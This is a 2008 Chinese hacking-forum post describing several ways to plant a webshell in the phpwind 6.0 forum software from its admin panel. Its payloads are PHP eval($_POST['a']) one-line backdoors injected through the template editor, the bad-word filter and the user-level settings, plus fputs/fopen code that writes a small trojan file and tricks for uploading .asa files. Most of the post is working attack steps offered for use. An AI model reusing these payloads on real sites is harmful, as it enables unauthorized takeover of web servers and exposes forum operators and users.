Board logo

标题: [讨论]phpwind6.0后台怎么拿shell? [打印本页]

作者: s37su37    时间: 2008-7-21 00:49     标题: [讨论]phpwind6.0后台怎么拿shell?

[讨论]phpwind6.0后台怎么拿shell?
议题作者:pt007@vip.sina.com
PHPwind后台获取Webshell,下面的几种方法我都试过了,没有一个成功的

由于4.6号发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:

方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码记住,这代码必须顶着左边行写,代码前面不可以有任何字符。 EOT; eval($a); print <<<EOT

例如,我写完某一行为。 .headurl { color:#ffffff;} EOT; eval($_POST['a']); print <<<EOT .index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell http://localhost/bbs/index.php (由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)密码是a lanker的一句话后门。

方始2 脏话过滤法

进入安全管理 ◇ 不良词语过滤

新增 不良词语写 a']='aa';eval($_POST['a']);// 替换为那里可以随意写

而后得到一个shell地址为 http://localhost/bbs/data/bbscache/wordsfb.php

密码是a lanker的一句话后门。

方式3 用户等级管理然后新建立会员组头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);// 升级点数依然可以随意写。

而后得到一个shell地址为 http://localhost/bbs/data/bbscache/level.php 密码是a lanker的一句话后门。

这里提供的方式随便你选一种都可以得到shell。。。方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。可我一一试过,没能拿到SHELL.

三种方法

1:后台添加个 asa 上传

2:<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>然后看图修改包含银行查件文件名


bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一

个a.php的最小马。

3:不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>插入,然后

备份wordsfb字段记下相对路径。 ----------------------------------------------------------------------

phpwind后台获得shell(貌似很管用)如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一个a.php的最小马。还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>插入,然后备份wordsfb字段记下相对路径。每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!

帖子209 精华30 积分3816 阅读权限100 性别男 在线时间432 小时




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2